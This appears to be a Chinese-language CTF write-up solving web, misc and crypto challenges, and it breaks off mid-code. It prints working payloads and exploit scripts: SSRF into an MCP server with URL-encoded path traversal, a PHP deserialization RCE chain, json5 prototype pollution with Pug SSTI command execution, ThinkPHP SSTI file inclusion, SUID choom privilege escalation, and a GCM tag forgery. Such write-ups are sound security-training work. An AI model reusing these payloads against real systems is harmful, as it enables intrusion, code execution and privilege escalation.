web#

nettool#

目标环境包含多层服务架构：

外部入口 (Port 80): 面向用户的 Web 应用。
内部管理服务 (Port 5000): 运行在 127.0.0.1:5000，包含一个 /admin/nettools 接口，该接口允许发送 HTTP 请求（本身就是一个 SSRF 漏洞）。
MCP 服务器 (Port 9000): 运行在 127.0.0.1:9000，是一个基于 JSON-RPC 的 MCP 服务器，通常用于给 AI 模型提供上下文工具和资源。

我们需要构造一个“双重 SSRF”攻击链： User -> Port 80 (Web) -> Port 5000 (Admin NetTool) -> Port 9000 (MCP Server)

通过 SSRF 访问 MCP 服务器，我们利用 JSON-RPC 协议进行枚举。

初始化会话: 首先发送 initialize 请求建立连接并获取 Session ID。

发现 Flag 位置: 调用 prompts/list 方法：

1
{
2
  "jsonrpc": "2.0",
3
  "method": "prompts/list",
4
  "id": 1
5
}

响应中包含一个名为 where_is_flag 的 prompt，其描述直接告诉我们 Flag 位于 /root/1ffflllaaaggg。

发现文件读取能力: 调用 resources/templates/list 方法：

1
{
2
  "jsonrpc": "2.0",
3
  "method": "resources/templates/list",
4
  "id": 2
5
}

响应揭示了一个资源模板：

URI Template: base64://tmp/{filename}
描述: “Get the /tmp file in base64 encoding.”

这意味着我们可以通过构造以 base64://tmp/ 开头的 URI 来读取 /tmp 目录下的文件。

直接尝试读取 base64://root/1ffflllaaaggg 会失败，因为该 URI 不匹配 base64://tmp/{filename} 模板。

我们需要利用 {filename} 参数进行路径遍历，以此访问 /tmp 目录之外的文件。

尝试 1 (失败): Payload: base64://tmp/../root/1ffflllaaaggg 结果: 失败。MCP 服务器或底层库（如 httpx 或 anyio）可能对标准路径遍历字符 ../ 进行了规范化处理或拦截。

尝试 2 (成功 - URL 编码绕过): 我们将路径分隔符和点号进行 URL 编码： Payload: base64://tmp/..%2froot%2f1ffflllaaaggg (其中 / 被编码为 %2f)

发送请求：

1
{
2
  "jsonrpc": "2.0",
3
  "method": "resources/read",
4
  "params": {
5
    "uri": "base64://tmp/..%2froot%2f1ffflllaaaggg"
6
  },
7
  "id": 3
8
}

服务器成功解析了编码后的路径，越权读取了 /root/1ffflllaaaggg 文件，并返回了 Base64 编码的内容。

exp：

1
read_payload = {
2
    "jsonrpc": "2.0",
3
    "method": "resources/read",
4
    "params": {
5
        "uri": "base64://tmp/..%2froot%2f1ffflllaaaggg"
6
    },
7
    "id": 5002
8
}
9

10
resp = send_double_ssrf("http://127.0.0.1:9000", method="POST", body=json.dumps(read_payload))
11
content = parse_mcp_response(resp)
12
flag_base64 = content['result']['contents'][0]['text']
13
flag = base64.b64decode(flag_base64).decode()
14
print(flag)

r#

打开题目链接，页面展示了 PHP 源码。核心逻辑如下：

入口点：

1
$payload = $_GET['p'] ??
2
'O:14:"RequestHandler":N';
3
@unserialize($payload);

存在反序列化漏洞，我们可以控制 $payload 。

目标类 RequestHandler ：
- __construct() ：初始化 $this->processor 为一个匿名类对象。这个匿名类的构造函数会调用 tmpfile() 创建一个文件句柄（Resource）。
- __destruct() ：析构函数，会将 $this->action 当作回调函数执行。

匿名类逻辑：

execute() ：这是我们要达到的目标，它执行 system($_GET[‘cmd’]) 。

防御机制：

1
if (!is_resource($this->handle)) {
2
    die("Invalid resource
3
    state<br>");
4
}
5
``` 它检查 $this->handle 是否为有效的资源。

序列化陷阱：

1
public function __wakeup() {
2
    $this->handle = null;
3
}
4
``` 当对象被反序列化时， __wakeup 会被调用，将 $handle 置为 null 。而且，PHP 中 Resource 类型本身是无法被序列化的（序列化后会变成 int 0 或 null），所以直接反序列化得到的对象，其 handle 一定无效。

核心难点：如何绕过 is_resource($this->handle) 的检查？

由于反序列化出来的对象 handle 必定无效，我们需要让代码在服务端现场运行 __construct() ，生成一个新的、带有有效 Resource 的匿名对象，并让析构函数调用这个新对象的 execute 方法。

利用链构造：

我们需要两个 RequestHandler 对象，记为 A 和 B。
利用 A 的析构函数 ( __destruct ) 去调用 B 的构造函数 ( __construct )。
- 设置 A 的 $action 为 [$ b, “__construct”] 。
- 这样当脚本结束 A 被销毁时，B 会重新初始化，B 内部的 $processor 会被赋值为一个全新的、带有有效 Resource 的匿名对象。
利用 B 的析构函数去执行这个新对象的 execute 方法。
- 设置 B 的 $action 为 [& \$ b->processor, “execute”] 。
- 关键点：这里必须使用引用 ( & )。
- 如果不由引用， $action 数组中保存的将是 B 此时（序列化时）的$ processor （即 null 或无效对象）。
- 使用引用后，当 A 触发 B->__construct() 更新了 B->processor 时， B->action 数组中的第一个元素也会随之指向这个新的匿名对象。
当 B 析构时，执行 $cb() 即$ b->processor->execute() ，此时检查通过，命令执行。

1
<?php
2

3
class RequestHandler {
4
    public $processor;
5
    public $action;
6
}
7

8
// 对象 B：负责执行命令
9
$b = new RequestHandler();
10
// 这里的 processor 先占位，反序列化后会是
11
null
12
$b->processor = null;
13
// 关键：将 action 的第一个元素设为对
14
processor 的引用
15
// 这样当 B->__construct 被调用，processor
16
更新时，action 也会指向新的 processor
17
$b->action = [&$b->processor, "execute"];
18

19
// 对象 A：负责触发 B 的重置
20
$a = new RequestHandler();
21
// A 析构时调用 B 的构造函数
22
$a->action = [$b, "__construct"];
23
$a->processor = null;
24

25
echo urlencode(serialize($a));

1
http://web-968f16e3be.challenge.xctf.org.cn:80/?cmd=cat /flag&p=[生成的Payload]
2
执行结果显示： flag{khL93MLMhRMo4wtUvcWxOTxIEQ9aaDrh}

react#

https://github.com/Spritualkb/CVE-2025-55182-exp

ezjs#

这道题目主要包含两个漏洞利用点： Prototype Pollution (原型链污染) 和 SSTI (服务端模板注入) 。

题目分析与源码审计通过扫描发现源码泄露（或题目直接提供源码），主要逻辑在 app.js 和 package.json 中。

package.json :
```
1
"dependencies": {
2
  "json5": "2.2.1",
3
  "pug": "^3.0.2",
4
  ...
5
}
```
注意到使用了 json5 库，版本 2.2.1 存在已知的原型链污染漏洞。

app.js (登录逻辑) :

1
app.post('/login',(req,res)=>{
2
    let userinfo=JSON.stringify(req.
3
    body)
4
    const user = JSON5.parse
5
    (userinfo) // 漏洞点1：使用 JSON5 解
6
    析
7
    if (waf(user, ['admin'])) { // WAF
8
    检查
9
        req.session.user = user
10
        if(req.session.user.admin ==
11
        true){ // 目标：让这里为 true
12
            req.session.user = 'admin'
13
            res.send('hello,admin')
14
        }
15
        ...

waf 函数只检查 Object.keys(obj) ，即对象自身的属性。

app.js (渲染逻辑) :

1
app.post('/render',(req,res)=>{
2
    if (req.session.user === 'admin'){
3
        var word = req.body.word
4
        const blacklist = ['require',
5
        'exec'] // 黑名单
6
        // ... 黑名单检查 ...
7
        var hello = 'welcome ' + word
8
        res.send(pugjs.render
9
        (hello)) // 漏洞点2：Pug 模板注入
10
    }
11
    ...
12
``` 2. 漏洞利用步骤
13
第一步：利用 Prototype Pollution 绕过登录验证

由于 waf 只检查对象自身的 key，我们可以利用 json5 的漏洞污染原型链，给 Object.prototype 添加 admin 属性。这样 user 对象本身没有 admin 属性（绕过 WAF），但读取 user.admin 时会从原型链上获取到 true （通过验证）。

Payload (POST /login) :

1
{
2
    "__proto__": {
3
        "admin": true
4
    }
5
}
6
``` 发送此请求后，服务器会设置包含 admin 权限的 Session。
7
第二步：利用 SSTI 读取 Flag

获取 Admin Session 后，可以访问 /render 接口。这里存在 Pug 模板注入，但过滤了 require 和 exec 关键字。我们可以利用字符串拼接来绕过黑名单，并通过 Node.js 的 child_process 执行系统命令。

绕过思路 : 使用 global.process.mainModule.require (或 root.process… ) 来引入模块。将 require 拆分为 ‘re’ + ‘quire’ 来绕过字符串检测。

Payload (POST /render) :

1
{
2
    "word": "#{global.process.
3
    mainModule['re'+'quire']
4
    ('child_process').spawnSync('cat',
5
    ['/flag']).stdout.toString()}"
6
}

exp

1
import requests
2

3
url = "http://web-6704f79fa6.challenge.
4
xctf.org.cn:80"
5
s = requests.Session()
6

7
# 1. Prototype Pollution 登录
8
headers = {"Content-Type": "application/
9
json"}
10
data_login = '{"__proto__": {"admin":
11
true}}'
12
s.post(f"{url}/login", data=data_login,
13
headers=headers)
14

15
# 2. SSTI 读取 Flag
16
# 构造 Payload: global.process.mainModule.
17
require('child_process').spawnSync('cat',
18
['/flag']).stdout.toString()
19
payload = "#{global.process.mainModule
20
['re'+'quire']('child_process').spawnSync
21
('cat', ['/flag']).stdout.toString()}"
22
data_render = {"word": payload}
23

24
response = s.post(f"{url}/render",
25
json=data_render)
26

27
print(response.text)
28
# Flag : flag{1grCxYZ1Wn6NAdObTj6v9NyhutotukTo}

easy-lua#

题目提供了一个 “Online Lua Executor” 网页，允许用户输入 Lua 代码并在服务端执行。我们的目标是利用这个执行环境找到并读取 Flag。首先，我们需要了解 Lua 运行环境中都有哪些可用的函数和变量。我们可以通过遍历 Lua 的全局表 _G 来查看环境信息。

Payload (Lua代码):

1
for k,v in pairs(_G) do
2
    print(k,v)
3
end

执行结果分析: 在输出的全局变量列表中，除了标准的 print , table , string 等库函数外，我们发现了几个非标准的自定义函数：

getFileList : 看起来用于获取文件列表
getFileContent : 看起来用于获取文件内容
S3cr3t0sEx3cFunc : 这个名字非常可疑 (Secret Exec Func)，暗示可能是一个用于执行命令的后门函数。

我们重点关注 S3cr3t0sEx3cFunc ，尝试猜测它的功能。通常这类 CTF 题目中的 “Exec” 函数是指执行系统 Shell 命令。

Payload:

1
print(S3cr3t0sEx3cFunc("whoami"))

执行结果:

1
root

返回了 root ，这证实了该函数存在 RCE (远程代码执行) 漏洞，并且我们拥有 root 权限。

现在我们可以执行任意命令，接下来就是寻找 flag 文件。

步骤 1: 查找 Flag 文件位置使用 find 命令在整个系统中搜索名称包含 “flag” 的文件。

Payload:

1
print(S3cr3t0sEx3cFunc("find / -name
2
flag*"))

执行结果:

1
/flag
2
... (其他包含flag的系统文件)

我们发现根目录下有一个 /flag 文件。

步骤 2: 读取 Flag 内容使用 cat 命令读取该文件。

Payload:

1
print(S3cr3t0sEx3cFunc("cat /flag"))
2
flag{aQWDVMBMW0jx3by8tRm9DUPO720Aw4r9}

renderme#

访问目标网站，发现 URL 参数 ?name=... 会被回显在页面上。尝试输入 {{7*7}}，页面报错，暴露出使用了 ThinkPHP 8.1.3 框架。

通过 ThinkPHP 的报错信息或尝试读取源码，我们确认了 index.php 的内容。使用 php://filter 伪协议读取 index.php 源码（需要绕过 WAF，或者直接盲测）：

1
// 关键代码逻辑
2
$blacklist = '/system|exec|passthru|shell_exec|popen|proc_open|include|pcntl|eval|assert|call_user_func|create_function|putenv|getenv|error_log|dl|mail|symlink|link|chroot|scandir|dir|glob|readfile|file_get_contents|highlight_file|show_source|fopen|flag|cat|php|\(|\)|\'|\"|`/i';
3
if (preg_match($blacklist, $name)) {
4
    die("Hacker detected!...");
5
}
6
return View::display("Hello, " . $name);

代码直接将用户输入传入 View::display，导致了 Server-Side Template Injection (SSTI) 漏洞。但是存在一个非常严格的黑名单，过滤了几乎所有命令执行函数、括号 ()、引号 ''"" 以及 flag 关键字。

由于无法直接调用函数（括号被过滤），我们需要寻找不使用括号的执行方式。 ThinkPHP 的模板引擎支持标签语法。我们可以利用 {if} 和 {foreach} 标签。

为了执行任意代码，我们采用 文件上传 + 文件包含 的策略：

构造一个 POST 请求，上传一个包含恶意 PHP 代码的文件（例如 payload.php）。
在 URL 的 name 参数中，利用 ThinkPHP 模板标签遍历 $_FILES 数组，获取上传文件的临时路径。
利用 require 包含这个临时文件（require 在 PHP 中是语言结构，不需要括号，且不在黑名单中）。

1
?name={foreach $_FILES as $f}{foreach $f as $k=>$v}{foreach $_POST as $p}{if $k==$p}{if require $v}X{/if}{/if}{/foreach}{/foreach}{/foreach}

外层循环遍历 $_FILES。
内层循环遍历文件属性。
配合 POST 参数 target=tmp_name，当找到 tmp_name 键时，执行 require $v（即包含临时文件）。

Payload.php 内容:

1
<?php
2
system('id'); // 测试命令
3
?>

攻击命令:

1
curl -g "http://TARGET/?name={foreach%20\$_FILES%20as%20\$f}{foreach%20\$f%20as%20\$k=>\$v}{foreach%20\$_POST%20as%20\$p}{if%20\$k==\$p}{if%20require%20\$v}X{/if}{/if}{/foreach}{/foreach}{/foreach}" -F "file=@payload.php" -F "target=tmp_name"

成功执行命令，获得 www-data 权限。

提权

获得 Shell 后，尝试读取 /flag 或 /root/flag 失败（权限不足）。进行信息收集，查找具有 SUID 权限的文件：

1
find / -perm -4000 2>/dev/null

输出结果中包含：

1
/usr/bin/choom
2
...

/usr/bin/choom 是一个用于调整进程 OOM-killer 评分的工具。通常它不需要 SUID 权限。检查其权限：

1
ls -la /usr/bin/choom
2
# -rwsr-xr-x 1 root root ...

发现它是 SUID root 的。

利用 choom 执行命令： choom 可以运行命令，如果它有 SUID 权限，运行的命令将继承 root 权限。

测试提权：

1
/usr/bin/choom --adjust 0 id
2
# uid=33(www-data) gid=33(www-data) euid=0(root) ...

可以看到 euid=0(root)，提权成功。

利用 root 权限读取 flag：

1
/usr/bin/choom --adjust 0 cat /root/flag

flag{xINPqcZCdNoGOxoOHb9GcmPVry30ClWu}

insph#

1
<?php
2
error_reporting(0);
3
session_start();
4
// ... (定义了 FileUpload, FileView, UserLogin, SystemTool 等类) ...
5

6
// 数据处理
7
if (isset($_GET['data'])) {
8
    $data = $_GET['data'];
9
    // 黑名单过滤
10
    if (preg_match("/zip|phar|uploads/i", $data)){
11
        exit("Don't use dangerous protocol!");
12
    }
13
    // 关键漏洞点：读取 data 指向的内容并写回 data 指向的路径
14
    file_put_contents($data, file_get_contents($data));
15
    echo "Data processed successfully!";
16
    exit;
17
}
18
?>

1
漏洞点：file_put_contents($data, file_get_contents($data));

1
?data=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|...|convert.base64-decode/resource=shell.php

file_get_contents 解析伪协议，执行我们构造的编码转换链，最终生成了这个字符串。file_put_contents 将生成的字符串写入到 shell.php 执行命令，可得flag

misc#

Protocol#

协议逆向分析，通过对服务端的交互和回显分析，我们还原了私有协议的头部结构。协议基于 TCP + SSL/TLS 传输，所有数据包采用如下的小端序（Little-Endian）结构：

1
struct Header {
2
    char magic[4];      // 0xe6, 0x13, 0x04, 0x34
3
    uint8_t version;    // 0x78
4
    uint8_t type;       // 包类型 (0x01=Handshake, 0x03=Plaintext)
5
    uint64_t timestamp; // 8字节时间戳
6
    uint16_t seq;       // 2字节序列号
7
    uint32_t length;    // 4字节包体长度
8
};

每个数据包之后通常跟随一个 \n 换行符作为结束/分隔。关键逻辑：Sequence Number (Seq)，协议要求严格的序列号同步。服务端和客户端维护同一个 seq 计数器：

每次发送或接收数据包，seq 都会递增。
在一个完整的请求-响应（Roundtrip）中，seq 会增加 2（发送+1，接收+1）。
如果 seq 不匹配，连接会被服务端断开。

接下来是密钥协商

发送 help 命令可以看到 negotiate 选项，提示使用 Diffie-Hellman (DH) 进行密钥交换。

DH 参数

通过分析或尝试标准组，确认使用的是 RFC 3526 Group 5 (1536-bit) 标准参数。

P: RFC 3526 定义的 1536-bit 素数。
G: 生成元 2。

协商流程

客户端发送: 构造 DH 公钥 $A = g^a \pmod P$ ，将 $A$ 转换为 192 字节（大端序），通过 TYPE_HANDSHAKE (0x01) 数据包发送。
服务端响应: 返回其 DH 公钥 $B$ （192 字节）。
计算共享密钥: 客户端计算共享密钥 $S = B^a \pmod P$ 。

密钥派生

通过对已知明文（如 help 命令的加密响应）或离线爆破，确定会话密钥的派生方式为： $\text{Session Key} = \text{SHA256}(\text{Shared Secret (Big Endian)})$ 即取共享密钥的大端字节序的 SHA256 哈希值作为 AES 密钥。

在协商完成后，发送 readflag 命令（可以使用 TYPE_PLAINTEXT 类型发送明文请求）。服务端会返回一段加密数据。

加密分析

通过观察加密数据的长度和特征（无填充特征，长度变化），推测使用流加密或 GCM 模式。对加密的 Flag 响应包体进行分析：

Nonce (IV): 包体的前 12 字节。
Tag: 包体的最后 16 字节。
Ciphertext: 中间部分。

这符合 AES-GCM 的标准结构。

解密步骤

提取 Nonce, Ciphertext, Tag。
使用派生的 Session Key 和 AES-GCM 模式进行解密。
获得明文 Flag。

1
# 1. 建立 SSL 连接并同步 Sequence
2
magic, ver, ptype, ts, seq, body = recv_pkt(ss)
3

4
# 2. 发送 DH 公钥 A
5
a = bytes_to_long(os.urandom(192)) % (P - 1)
6
A = pow(G, a, P)
7
send_pkt(ss, ts, seq + 1, TYPE_HANDSHAKE, long_to_bytes(A, 192))
8

9
# 3. 接收公钥 B 并计算 Session Key
10
_, _, _, rts, rseq, B_bytes = recv_pkt(ss)
11
B = bytes_to_long(B_bytes)
12
S = pow(B, a, P)
13
session_key = sha256(long_to_bytes(S, 192)).digest()
14

15
# 4. 发送 readflag 请求
16
send_pkt(ss, rts, rseq + 1, TYPE_PLAINTEXT, b'readflag')
17

18
# 5. 接收并解密 Flag (AES-GCM)
19
_, _, _, _, _, enc_body = recv_pkt(ss)
20
nonce = enc_body[:12]
21
ciphertext = enc_body[12:-16]
22
tag = enc_body[-16:]
23
cipher = AES.new(session_key, AES.MODE_GCM, nonce=nonce)
24
flag = cipher.decrypt(ciphertext)
25
print(flag)
26
# flag{QkIyDyHKvsf21le0jy4BgHS4L0lAWFcf}

crypto#

Loss N#

1. 恢复 $\phi(n)$

RSA 的核心关系式为： $e \cdot d \equiv 1 \pmod{\phi(n)}$ 这意味着存在一个整数 $k$ ，满足：e \cdot d - 1 = k \cdot \phi(n)$$

由于 $e = 65537$ 比较小， $k$ 的取值范围大致在 $(1, e)$ 之间。我们可以通过爆破 $k$ 来尝试恢复 $\phi(n)$ ： $\phi(n) = \frac{e \cdot d - 1}{k}$

2. 分解 $\phi(n)$ 得到 $p$

根据题目条件 $q = \text{next\_prime}(p)$ ，说明 $p$ 和 $q$ 非常接近。 $\phi(n) = (p-1)(q-1) \approx p^2$ 因此，我们可以通过对 $\phi(n)$ 开方得到 $p$ 的近似值： $p \approx \sqrt{\phi(n)}$

3. 搜索与验证

我们计算出的 $p_{approx} = \text{isqrt}(\phi(n))$ 会略大于或等于真实的 $p$ （因为 $\phi(n) < n = p \cdot q \approx p^2$ 其实 $\phi(n) \approx p^2$ 依然成立，但 $(p-1)(q-1)$ 略小于 $p^2$ 若 $q \approx p$ ）。更精确地说，由于 $q > p$ ，则 $(p-1)(q-1) > (p-1)^2$ ，所以 $\sqrt{\phi} > p-1$ 。我们可以从 $p_{approx}$ 开始向下小范围搜索 $p$ 。

对于每一个猜测的 $p$ ：

验证 $(p-1)$ 是否能整除 $\phi(n)$ 。
计算对应的 $q = \frac{\phi(n)}{p-1} + 1$ 。
验证 $p$ 和 $q$ 是否均为素数。
验证是否满足 $q = \text{next\_prime}(p)$ 。

exp

1
from Crypto.Util.number import long_to_bytes
2
import gmpy2
3

4
# 题目数据
5
c = 30552929401084215063034197070424966877689134223841680278066312021587156531434892071537248907148790681466909308002649311844930826894649057192897551604881567331228562746768127186156752480882861591425570984214512121877203049350274961809052094232973854447555218322854092207716140975220436244578363062339274396240
6
d = 3888417341667647293339167810040888618410868462692524178646833996133379799018296328981354111017698785761492613305545720642074067943460789584401752506651064806409949068192314121154109956133705154002323898970515811126124590603285289442456305377146471883469053362010452897987327106754665010419125216504717347373
7
e = 0x10001
8

9
print("正在搜索 k...")
10

11
# 遍历 k 来寻找 phi
12
for k in range(1, e):
13
    if (e * d - 1) % k == 0:
14
        phi = (e * d - 1) // k
15

16
        # 利用 phi 近似计算 p
17
        # phi = (p-1)(q-1) approx p^2
18
        p_approx = gmpy2.isqrt(phi)
19

20
        # 在近似值附近搜索 p
21
        p = p_approx
22
        for i in range(20000):
23
            if phi % (p - 1) == 0:
24
                q_minus_1 = phi // (p - 1)
25
                q = q_minus_1 + 1
26

27
                # 验证素数和 next_prime 条件
28
                if gmpy2.is_prime(p) and gmpy2.is_prime(q):
29
                    if q == gmpy2.next_prime(p):
30
                        print(f"找到 k = {k}")
31
                        print(f"p = {p}")
32
                        print(f"q = {q}")
33
                        n = p * q
34
                        m = pow(int(c), int(d), int(n))
35
                        try:
36
                            flag = long_to_bytes(m)
37
                            print(f"Flag: {flag.decode()}")
38
                            exit(0)
39
                        except:
40
                            pass
41
            p -= 1
42
# flag{Y0u_kNow_h0w_7o_f4cTor1z3_phI}

ComCompleXX#

题目实现了一个基于四元数（Quaternion）环上的 RSA 密码系统。

$n = p \times q$ ，其中 $p, q$ 为 512 位素数。
$e$ 是公钥指数，非常大（约 3070 位）。
$d$ 是私钥指数，题目提示 d_len: 500，即 $d$ 只有 500 位左右。
加密过程： $C = M^e \pmod n$ ，运算在四元数环上进行。

在四元数环 $\mathbb{H}(\mathbb{Z}_n)$ 中，群的阶（Order）与 $p(p^2-1)$ and $q(q^2-1)$ 有关。具体来说，该群的指数（Exponent，即所有元素的阶的最小公倍数） $\lambda$ 为： $\lambda = \text{lcm}(p(p^2-1), q(q^2-1))$

近似来看： $\lambda \approx p^3 q^3 = n^3$

根据 RSA 的解密条件： $ed \equiv 1 \pmod \lambda$ 即存在整数 $k$ 使得： $ed = k\lambda + 1$

由于 $e \approx n^3$ 且 $\lambda \approx n^3$ ，我们可以推测 $\frac{e}{n^3} \approx \frac{k}{d}$ 。又因为 $d$ 非常小（500位），这符合 Wiener’s Attack（维纳攻击）的场景。我们可以利用连分数展开 $\frac{e}{n^3}$ 来寻找 $k/d$ 。

更精确地分析 $\lambda$ ： $\lambda \approx (p^3-p)(q^3-q) \approx p^3q^3 - pq(p^2+q^2) \approx n^3 - n(p^2+q^2)$

代入 $ed \approx k\lambda$ ： $ed \approx k(n^3 - n(p^2+q^2))$ ， $\frac{e}{n^3} \approx \frac{k}{d} (1 - \frac{p^2+q^2}{n^2})$

由于 $p, q \approx n^{1/2}$ ，故 $\frac{p^2+q^2}{n^2} \approx \frac{2n}{n^2} \approx \frac{2}{n}$ ，这是一个非常小的项，不影响连分数攻击的有效性。

连分数攻击：对 $\frac{e}{n^3}$ 进行连分数展开，计算渐进分数，作为 $\frac{k}{d}$ 的候选值。
恢复 $p, q$ ：对于每一组候选 $(k, d)$ ，我们可以估算 $\lambda$ 的一部分。由 $ed - 1 = k \cdot Y$ ，其中 $Y \approx \lambda$ 。我们有 $Y \approx n^3 - n(p^2+q^2)$ 。从而可以计算出 $S = p^2 + q^2 \approx \frac{n^3 - Y}{n}$ 。

有了 $p^2+q^2$ 和 $p^2q^2 = n^2$ ，我们可以构造一元二次方程求解 $p^2$ 和 $q^2$ ： $X^2 - (p^2+q^2)X + (pq)^2 = 0$ ，解出 $p^2$ 后开方即可得到 $p$ ，进而得到 $q$ 。
解密：得到 $p, q$ 后，计算准确的 $\lambda = \text{lcm}(p(p^2-1), q(q^2-1))$ 。计算私钥 $d = e^{-1} \pmod \lambda$ 。使用私钥对密文进行四元数幂模运算解密。

利用连分数恢复 $p, q$ 。

1
from Crypto.Util.number import *
2
import math
3

4
n =
5
e =
6

7
def continued_fraction(numerator, denominator):
8
    while denominator:
9
        q = numerator // denominator
10
        yield q
11
        numerator, denominator = denominator, numerator % denominator
12

13
def convergents(cf):
14
    n0, d0 = 0, 1
15
    n1, d1 = 1, 0
16
    for q in cf:
17
        n2, d2 = q * n1 + n0, q * d1 + d0
18
        yield n2, d2
19
        n0, d0 = n1, d1
20
        n1, d1 = n2, d2
21

22
def is_perfect_square(n):
23
    if n < 0: return False
24
    x = int(math.isqrt(n))
25
    return x * x == n
26

27
def solve_quadratic(a, b, c):
28
    # ax^2 + bx + c = 0
29
    delta = b*b - 4*a*c
30
    if delta < 0: return None
31
    if not is_perfect_square(delta): return None
32
    sqrt_delta = math.isqrt(delta)
33
    if ( -b + sqrt_delta ) % (2*a) == 0:
34
        return ( -b + sqrt_delta ) // (2*a)
35
    return None
36

37
cf = continued_fraction(e, n**3)
38
convs = convergents(cf)
39

40
for K, d in convs:
41
    if d == 0: continue
42
    if K == 0: continue
43

44
    # Check if d is around 500 bits
45
    if d.bit_length() > 510:
46
        # We can stop if d gets too large, but let's check a bit further just in case
47
        if d.bit_length() > 520:
48
            break
49

50
    # Y = (ed - 1) / K
51
    # Y = n^3 - n(p^2+q^2) + n
52
    # n(p^2+q^2) = n^3 + n - Y
53

54
    if (e*d - 1) % K != 0:
55
        continue
56

57
    Y = (e*d - 1) // K
58
    val = n**3 + n - Y
59
    if val % n != 0:
60
        continue
61

62
    sum_sq = val // n # p^2 + q^2
63

64
    # We have p^2 + q^2 = sum_sq
65
    # We have p^2 * q^2 = n^2
66
    # Z^2 - sum_sq * Z + n^2 = 0  (roots are p^2, q^2)
67

68
    res = solve_quadratic(1, -sum_sq, n**2)
69
    if res:
70
        p2 = res
71
        if is_perfect_square(p2):
72
            p = math.isqrt(p2)
73
            if n % p == 0:
74
                print(f"Found p: {p}")
75
                q = n // p
76
                print(f"Found q: {q}")
77

78
                # Verify d
79
                # We need to construct the QN class and decrypt
80
                break
81
else:
82
    print("Failed to find p, q")

利用恢复的 $p, q$ 解密 flag。

1
from Crypto.Util.number import *
2

3
n =
4
e =
5
c_tuple =
6

7
p =
8
q =
9

10
class QN:
11
    def __init__(self, a, b, c, d, n):
12
        self.a = a % n
13
        self.b = b % n
14
        self.c = c % n
15
        self.d = d % n
16
        self.n = n
17
    def __mul__(self, other):
18
        if isinstance(other, QN) and self.n == other.n:
19
            n = self.n
20
            a1, b1, c1, d1 = self.a, self.b, self.c, self.d
21
            a2, b2, c2, d2 = other.a, other.b, other.c, other.d
22
            a = (a1*a2 - b1*b2 - c1*c2 - d1*d2) % n
23
            b = (a1*b2 + b1*a2 + c1*d2 - d1*c2) % n
24
            c = (a1*c2 - b1*d2 + c1*a2 + d1*b2) % n
25
            d = (a1*d2 + b1*c2 - c1*b2 + d1*a2) % n
26
            return QN(a, b, c, d, n)
27
        return NotImplemented
28
    def __pow__(self, exp):
29
        if exp <= 0:
30
            return QN(1, 0, 0, 0, self.n)
31
        result = QN(1, 0, 0, 0, self.n)
32
        base = self
33
        while exp > 0:
34
            if exp & 1:
35
                result = result * base
36
            base = base * base
37
            exp >>= 1
38
        return result
39
    def __repr__(self):
40
        return f"({self.a}, {self.b}, {self.c}, {self.d})"
41

42
def LCM(a, b):
43
    return abs(a*b) // GCD(a,b)
44

45
lam_p = p * (p**2 - 1)
46
lam_q = q * (q**2 - 1)
47
lam = LCM(lam_p, lam_q)
48

49
d = inverse(e, lam)
50
print(f"Recovered d bits: {d.bit_length()}")
51

52
c = QN(c_tuple[0], c_tuple[1], c_tuple[2], c_tuple[3], n)
53
m = pow(c, d)
54

55
try:
56
    print(long_to_bytes(m.a))
57
except:
58
    print("Failed to convert m.a to bytes")
59
    print(m.a)
60

61
# flag{Qu4t3rNion_l5_S0_6rea7_&_Ch4rm1n9}

POC#

服务器提供了一个 PaddingOracleClass 类。
用户可以更新 nonce，每次更新后 cnt 重置为 2。
register 和 login 操作都会消耗 cnt。
漏洞点：在同一个 nonce 下，我们可以进行两次 register 操作。这意味着我们可以获得两组使用相同 Key 和 Nonce 加密的 (Ciphertext, Tag) 对。

漏洞原理

AES-GCM 是一种流加密模式（CTR）加上认证（GMAC）。

加密 (Encryption): $C = P \oplus \text{Keystream}$ Keystream 由 Key 和 Nonce 生成。如果 Key 和 Nonce 不变，Keystream 也不变。
认证 (Authentication): GCM 的 Tag 计算基于 GHASH 函数： $T = \text{GHASH}_H(A, C) \oplus E_K(J_0)$ 其中 $H = E_K(0)$ 是认证密钥， $E_K(J_0)$ 是用于掩盖 Tag 的掩码。

对于单块（或忽略长度块影响的简化模型），GHASH 大致结构为多项式求值。在本题中，没有关联数据 (AAD)，且假设我们关注密文块的影响。 $T = (C \cdot H^2 + L \cdot H) \oplus E_K(J_0)$ (注：实际 GCM 多项式更复杂，包含长度块 L，但在差分时常数项和相同长度的 L 会抵消)

攻击路径

第一步：恢复认证密钥 H

当我们使用相同的 Nonce 注册两个不同的用户名时：

第一组： $(C_1, T_1)$
第二组： $(C_2, T_2)$

由于 Nonce 相同， $E_K(J_0)$ 相同。 $T_1 \oplus T_2 = \text{GHASH}_H(C_1) \oplus \text{GHASH}_H(C_2)$

利用 GCM 的线性性质（在 GF(2^128) 上）： $T_1 \oplus T_2 = (C_1 \oplus C_2) \cdot H^2$

由此我们可以解出 $H^2$ ，进而求平方根得到 $H$ ： $H^2 = (T_1 \oplus T_2) \cdot (C_1 \oplus C_2)^{-1}$

第二步：伪造 Admin Token

得到 $H$ 后，我们就可以伪造任意密文的 Tag。

更新 Nonce（重置 cnt），并注册一个新的随机用户 $P_3$ ，得到 $(C_3, T_3)$ 。
获取密钥流： $K = C_3 \oplus P_3$
伪造密文：目标明文 $P_{admin} = \text{pad(b"admin")}$ $C_{admin} = P_{admin} \oplus K$
伪造 Tag：利用已知的 $(C_3, T_3)$ 和目标 $C_{admin}$ 计算差分： $T_{admin} \oplus T_3 = (C_{admin} \oplus C_3) \cdot H^2$ $T_{admin} = T_3 \oplus ((C_{admin} \oplus C_3) \cdot H^2)$
发送伪造的 Token $(C_{admin}, T_{admin})$ 进行登录，即可通过验证并获取 Flag。

exp

我们需要实现 $GF(2^{128})$ 上的运算（加法、乘法、求逆、开方）。

$GF(2^{128})$ 运算库

1
def bytes_to_long(b):
2
    return int.from_bytes(b, 'big')
3

4
def long_to_bytes(n):
5
    return n.to_bytes(16, 'big')
6

7
class GField:
8

9
    def __init__(self, val=0):
10
        self.val = val
11

12
    def __add__(self, other):
13
        return GField(self.val ^ other.val)
14

15
    def __mul__(self, other):
16
        x = self.val
17
        y = other.val
18
        res = 0
19
        for i in range(128):
20
            if (y >> (127 - i)) & 1:
21
                res ^= x
22
            if x & 1:
23
                x = (x >> 1) ^ 0xE1000000000000000000000000000000
24
            else:
25
                x >>= 1
26
        return GField(res)
27

28
    def pow(self, n):
29
        res = GField(1 << 127)
30
        pass
31

32

33
def gcm_mul(a, b):
34
    # a and b are 128-bit integers
35
    p = 0
36
